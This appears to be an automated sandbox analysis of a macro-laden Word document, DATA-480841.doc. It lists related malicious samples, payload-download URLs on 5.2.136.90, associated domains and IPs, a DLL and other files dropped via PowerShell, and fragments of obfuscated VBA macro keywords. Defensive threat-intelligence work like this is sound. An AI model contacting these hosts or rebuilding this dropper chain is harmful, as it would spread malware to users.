                                            informazioni-0501-012021.docGet hashmaliciousBrowse
                                            • 5.2.136.90/kcdo20u2bqptv6/
                                            rapport 40329241.docGet hashmaliciousBrowse
                                            • 5.2.136.90/6s0p53atjr9ihwygvd/svxo4o84aueyhj9v5m/5lqp30jb/g0ur1kwrzvgj3o0gmmo/dw8my2m1fzzo/
                                            info_39534.docGet hashmaliciousBrowse
                                            • 5.2.136.90/5ciqo/dhqbj3xw/
                                            Dati_012021_688_89301.docGet hashmaliciousBrowse
                                            • 5.2.136.90/l7tybna/g7nyjudv6/gf8bykzqxpzupj/wr2o0u8id88pf7dgmx3/9zupu1q7mb/wtjo6ov5niso7jo0n/
                                            2199212_20210105_160680.docGet hashmaliciousBrowse
                                            • 5.2.136.90/vcpu82n/rvhhoco3em4jtl/qxey084opeuhirghxzs/bm8x5w07go1ogzflbv/32imx8ryeb30/bd7tg46kn/
                                            ARCHIVO_FILE.docGet hashmaliciousBrowse
                                            • 5.2.136.90/ji02pdi/39rfb96opn/
                                            doc_X_13536.docGet hashmaliciousBrowse
                                            • 5.2.136.90/glhz448zi9act/ieva/q040/sl9198fns4q2/
                                            REP380501 040121.docGet hashmaliciousBrowse
                                            • 5.2.136.90/09hsu3aavqd4/8opns7c/oxp5fp7awb/
                                            doc-20210104-0184.docGet hashmaliciousBrowse
                                            • 5.2.136.90/78ro59myn48w9a6ku/bcgjwwwuc/
                                            7823099012021.docGet hashmaliciousBrowse
                                            • 5.2.136.90/bl7bvpp8itof0dvu5j2/nwcw9ztkp/yjrulniti57vcwwk67t/6u49kr6/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            wpsapk.comDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            Adjunto.docGet hashmaliciousBrowse
                                            • 104.18.60.59
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • 104.18.60.59
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • 104.18.60.59
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • 172.67.141.14
                                            info_39534.docGet hashmaliciousBrowse
                                            • 172.67.141.14
                                            veterinariadrpopui.comDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            Adjunto.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            info_39534.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            sofsuite.comDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 104.27.144.251
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 104.27.145.251
                                            Adjunto.docGet hashmaliciousBrowse
                                            • 104.27.144.251
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • 104.27.144.251
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • 104.27.145.251
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • 104.27.144.251
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • 104.27.145.251
                                            info_39534.docGet hashmaliciousBrowse
                                            • 172.67.158.72
                                            khanhhoahomnay.netDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 210.86.239.69
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 210.86.239.69

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            NETNAM-AS-APNetnamCompanyVNDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 210.86.239.69
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 210.86.239.69
                                            LIQUIDWEBUSDocumenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            https://securemail.bridgepointeffect.com/Get hashmaliciousBrowse
                                            • 69.167.167.26
                                            Adjunto.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            NQN0244_012021.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            4560 2021 UE_9893.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            Scan-0767672.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            Documento-2021.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            info_39534.docGet hashmaliciousBrowse
                                            • 209.59.139.39
                                            https://encrypt.idnmazate.org/Get hashmaliciousBrowse
                                            • 67.225.177.41
                                            Nuevo pedido.exeGet hashmaliciousBrowse
                                            • 209.188.81.142
                                            https://6354mortgagestammp.com/Get hashmaliciousBrowse
                                            • 69.16.199.206
                                            rib.exeGet hashmaliciousBrowse
                                            • 72.52.175.20
                                            https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsecuremail.danchihosassociates.com&c=E,1,HOuENPlSucTdSUxKwjhrlo_5dPC7J6R1N-Gq03z50mu0n-SbGg9k6UcvRdnb2hWVC0JKp04hBPt2pBkJTi_IhWBa5JSs0U_QUfg3Hl_nTWTxJyTIR8N3&typo=1Get hashmaliciousBrowse
                                            • 67.225.158.30
                                            messaggio 2912.docGet hashmaliciousBrowse
                                            • 67.227.152.97
                                            8415051-122020.docGet hashmaliciousBrowse
                                            • 67.227.152.97
                                            Mensaje 900-777687.docGet hashmaliciousBrowse
                                            • 67.227.152.97
                                            088-29-122020-522-0590.docGet hashmaliciousBrowse
                                            • 67.227.152.97
                                            MENSAJE KCW_9805910.docGet hashmaliciousBrowse
                                            • 67.227.152.97
                                            https://image-grafix.com/0098/099/Get hashmaliciousBrowse
                                            • 72.52.133.164
                                            CLOUDFLARENETUSeTrader-0.1.0.exeGet hashmaliciousBrowse
                                            • 104.23.98.190
                                            Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            eTrader-0.1.0.exeGet hashmaliciousBrowse
                                            • 104.23.99.190
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            Payment Documents.xlsGet hashmaliciousBrowse
                                            • 104.22.1.232
                                            Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                            • 104.22.1.232
                                            QPI-01458.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            LITmNphcCA.exeGet hashmaliciousBrowse
                                            • 104.28.5.151
                                            http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                            • 172.67.179.45
                                            http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                                            • 104.16.203.237
                                            http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135Get hashmaliciousBrowse
                                            • 104.16.19.94
                                            https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9Get hashmaliciousBrowse
                                            • 104.16.18.94
                                            http://reppoflag.net/2307e0382f77c950a2.jsGet hashmaliciousBrowse
                                            • 172.64.170.19
                                            https://firebasestorage.googleapis.com/v0/b/blckaxe.appspot.com/o/general%20page.html?alt=media&token=b4029a1b-78f5-43ff-a7eb-d4555ad6a60e#kymo@willowoodusa.comGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            http://hoquetradersltd.com/jordanbruce/index.phpGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                            • 104.18.70.113
                                            https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.htmlGet hashmaliciousBrowse
                                            • 104.16.115.104
                                            HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                                            • 172.67.156.125
                                            http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                            • 104.18.225.52
                                            https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                            • 104.18.70.113
                                            CLOUDFLARENETUSeTrader-0.1.0.exeGet hashmaliciousBrowse
                                            • 104.23.98.190
                                            Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            eTrader-0.1.0.exeGet hashmaliciousBrowse
                                            • 104.23.99.190
                                            pack-91089 416755919.docGet hashmaliciousBrowse
                                            • 104.18.61.59
                                            Payment Documents.xlsGet hashmaliciousBrowse
                                            • 104.22.1.232
                                            Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                            • 104.22.1.232
                                            QPI-01458.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            LITmNphcCA.exeGet hashmaliciousBrowse
                                            • 104.28.5.151
                                            http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                            • 172.67.179.45
                                            http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                                            • 104.16.203.237
                                            http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135Get hashmaliciousBrowse
                                            • 104.16.19.94
                                            https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9Get hashmaliciousBrowse
                                            • 104.16.18.94
                                            http://reppoflag.net/2307e0382f77c950a2.jsGet hashmaliciousBrowse
                                            • 172.64.170.19
                                            https://firebasestorage.googleapis.com/v0/b/blckaxe.appspot.com/o/general%20page.html?alt=media&token=b4029a1b-78f5-43ff-a7eb-d4555ad6a60e#kymo@willowoodusa.comGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            http://hoquetradersltd.com/jordanbruce/index.phpGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                            • 104.18.70.113
                                            https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.htmlGet hashmaliciousBrowse
                                            • 104.16.115.104
                                            HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                                            • 172.67.156.125
                                            http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                            • 104.18.225.52
                                            https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                            • 104.18.70.113

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B01F17D-537D-406E-B057-1B1541B1D39D}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):46
                                            Entropy (8bit):1.0424600748477153
                                            Encrypted:false
                                            SSDEEP:3:/lbWwWl:sZ
                                            MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                            SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                            SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                            SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                            Malicious:false
                                            Preview: ........................................user.
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DATA-480841.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 6 15:44:40 2021, length=169984, window=hide
                                            Category:dropped
                                            Size (bytes):2038
                                            Entropy (8bit):4.495422520712642
                                            Encrypted:false
                                            SSDEEP:24:8rk/XTm6GreV2UNeM0Dv3qcdM7dD2rk/XTm6GreV2UNeM0Dv3qcdM7dV:8rk/XTFGqMUN1cQh2rk/XTFGqMUN1cQ/
                                            MD5:0CDFA0D89B4174F43B7C98022E2F67A9
                                            SHA1:008543A332890FB46A197EA8B2A2BF9972D66097
                                            SHA-256:20B80A3021EC817285D5BF337B8F4A53C94B7E53F690B000FB63C41733F9F327
                                            SHA-512:7287791BE8D03043B880AA542ADF149D8CB4A773F384164D2C60DD64BC2D621B7ACA4641E63A36D9E364C62CA6551815939BFD4DFD44B6936E98CA368B2EDC32
                                            Malicious:false
                                            Preview: L..................F.... ...+....{..+....{..r.':K................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.....&R.. .DATA-4~1.DOC..L.......Q.y.Q.y*...8.....................D.A.T.A.-.4.8.0.8.4.1...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\DATA-480841.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.A.T.A.-.4.8.0.8.4.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):71
                                            Entropy (8bit):4.205347563368731
                                            Encrypted:false
                                            SSDEEP:3:M1yxkI0U5m0UmX1yxkI0Uv:Mwr0Gm0+r02
                                            MD5:393D2B811D2C21BEC5044DA35CB2B892
                                            SHA1:7034476F98514692497F81BA49080B25E16ADA4E
                                            SHA-256:A39A8F9194A9550DBB104AEF26FEAAA393BF5556B5858FA6F2BF94C70ADE2491
                                            SHA-512:A19B46013D6958EE4B24D1B5C37466A0EBE85B0187003970900753A42076124A38B4DDC880560DBEB9E80976887A4AFCD9E0A889E504575BBB5E223C688F3858
                                            Malicious:false
                                            Preview: [doc]..DATA-480841.LNK=0..DATA-480841.LNK=0..[doc]..DATA-480841.LNK=0..
                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                            MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                            SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                            SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                            SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IA60F366WYHGBU3KMBI7.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5864454036976654
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqbqvsqvJCwoSz8hQCsMqbqvsEHyqvJCwor8zv1YkHVf8OzlUVIIu:cy+oSz8yWHnor8zvpf8OjIu
                                            MD5:381B309891E02EEBC8A0AD30FA4A8C2E
                                            SHA1:1D4C2C8EFB538F3FDC7696EE142B50199A1A6B45
                                            SHA-256:BBFB5B76E4CC383551743BC5C9F1DCE3EF0978D7CF3033932C5E2CE7EAB97BDF
                                            SHA-512:CD7A09AFC5713E01CAC59A5E5E52B7B42E8EBC23818C6D97363DB2FDC73C06B3889080BE8D67D15B228D77FBADA9B82B4078F200707A4E079B983AB432821F0E
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\Desktop\~$TA-480841.doc
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                            MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                            SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                            SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                            SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                            C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):200625
                                            Entropy (8bit):7.475413668537472
                                            Encrypted:false
                                            SSDEEP:3072:CtEwbpDnn9FfrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:CtEsl9FTaBYF0nVp2MJHybR8dS9
                                            MD5:D3EF5D9C09B25890DACFCE5D440EA042
                                            SHA1:F88C6C45E5E5A8A3573D20EDF7C474B29778002A
                                            SHA-256:52CDD409E97D303319405D775622CC2BF34BBF76E0EF3C018F6D13EA395D7766
                                            SHA-512:FAC932431D0A1457377DE14A713E6DEF91382A6764355D6575763941BF75E23267AF5BECDEBE85726842A83B5B1D601C39627C8661A79AF45689A861E33332D2
                                            Malicious:false
                                            Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: lime payment B2B responsive Practical solid state copy compelling, Author: Clment Fontaine, Template: Normal.dotm, Last Saved By: La Menard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 10:15:00 2021, Last Saved Time/Date: Tue Jan 5 10:15:00 2021, Number of Pages: 1, Number of Words: 2640, Number of Characters: 15049, Security: 8
                                            Entropy (8bit):6.709357793973764
                                            TrID:
                                            • Microsoft Word document (32009/1) 79.99%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                            File name:DATA-480841.doc
                                            File size:169330
                                            MD5:2ed8a95357ee4e2d433bcbeb2ef43fc9
                                            SHA1:06838eec498718aace03e6ef28d3f0292a631f8a
                                            SHA256:485c5e8d7bc0f0fc416a7d6cfa8780ebc42c03ff41568af70c358ee8b8afa02c
                                            SHA512:4a02c2878c9787ed268744ecbce51cbf082e5f4d9403867e63ccba10c04c91558d25a22608fad763748d356c29fbe1b3ef3ea28ae38ab534def6380cd5434b9b
                                            SSDEEP:3072:4D9ufstRUUKSns8T00JSHUgteMJ8qMD7gs:4D9ufsfgIf0pLs
                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "DATA-480841.doc"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Office Word
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1252
                                            Title:
                                            Subject:lime payment B2B responsive Practical solid state copy compelling
                                            Author:Clment Fontaine
                                            Keywords:
                                            Comments:
                                            Template:Normal.dotm
                                            Last Saved By:La Menard
                                            Revion Number:1
                                            Total Edit Time:0
                                            Create Time:2021-01-05 10:15:00
                                            Last Saved Time:2021-01-05 10:15:00
                                            Number of Pages:1
                                            Number of Words:2640
                                            Number of Characters:15049
                                            Creating Application:Microsoft Office Word
                                            Security:8

                                            Document Summary

                                            Document Code Page:-535
                                            Number of Lines:125
                                            Number of Paragraphs:35
                                            Thumbnail Scaling Desired:False
                                            Company:
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:917504

                                            Streams with VBA

                                            VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117
                                            General
                                            Stream Path:Macros/VBA/A5gd21klfqu9c6rs
                                            VBA File Name:A5gd21klfqu9c6rs
                                            Stream Size:1117
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 49 85 f4 e6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            Private
                                            VB_Exposed
                                            Attribute
                                            VB_Creatable
                                            VB_Name
                                            Document_open()
                                            VB_Customizable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: Owppnp8hah4xo788, Stream Size: 17915
                                            General
                                            Stream Path:Macros/VBA/Owppnp8hah4xo788
                                            VBA File Name:Owppnp8hah4xo788
                                            Stream Size:17915
                                            Data ASCII:. . . . . . . . . | . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . I . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 a3 30 00 00 00 00 00 00 01 00 00 00 49 85 65 07 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            DpYbmDA
                                            oAaNlB
                                            vrYYHIDxI
                                            WTbkNqFa
                                            Object
                                            RjiQHRA
                                            "bBmgOCvPPojGGC"
                                            MNihxICY
                                            DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                                            GfRPP
                                            tWcKo
                                            OMZxxg
                                            "lwWhZGEasjsS"
                                            "deVdMyoREdgzCaJb"
                                            fDZVKAAc:
                                            uWZkeMFv.WriteLine
                                            xLQtMd
                                            nleaHR
                                            gEcrV:
                                            "OyFBLhlWUnD"
                                            uWZkeMFv.Close
                                            xsruLB
                                            zDsRaIBGF
                                            mgrwfmN
                                            "XZzpBRpDKuMgsGHIHF"
                                            "VrVKCjefsIJ"
                                            pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                                            SblcDCC:
                                            SQQWY
                                            "hbtzFRJEXyDCXI"
                                            iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                                            sCOIGDtD:
                                            gxBPJB
                                            jbUmDI
                                            DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                                            "BnxHFzJCGhVHrFIm"
                                            IcAHwPH
                                            iFTmFHFH
                                            STzBjwICv
                                            kwzjKvZHe
                                            fDZVKAAc.WriteLine
                                            plqkuDI
                                            RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                                            ZMdrVHGz:
                                            SeHafBC
                                            nhLeJMLfI
                                            EISYDDB
                                            EhCMG
                                            UDSpFHqFJ
                                            WlBWDXGD
